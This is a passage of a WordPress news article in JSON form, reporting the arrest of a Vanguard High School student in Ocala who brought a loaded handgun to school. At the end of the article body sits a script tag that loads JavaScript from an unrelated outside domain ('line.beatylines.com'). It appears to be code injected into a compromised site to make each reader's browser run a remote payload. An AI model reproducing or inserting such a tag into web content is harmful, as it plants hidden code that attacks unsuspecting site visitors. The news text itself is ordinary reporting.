R. Williams and stated that they believed another student had a gun in his backpack.<\/p>\n<p>The teen in question was allegedly overheard telling another student that he had a gun in his backpack after he swung his backpack and hit a pole causing a metal banging sound.<\/p>\n<p>During the investigation, the 17-year-old student was removed from class at which time Ofc. Williams searched his backpack and found a loaded Ruger .22 cal handgun.<\/p>\n<p>The teen was arrested and charged with possession of a firearm on school property, possession of a firearm by a minor, and improper exhibition of a firearm.<\/p>\n<p>He was transported to the Marion County Jail Juvenile Division.<script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>OCALA &#8211;\u00a0A Vanguard High School student was arrested Tuesday after bringing a gun to school according to Ocala Police.
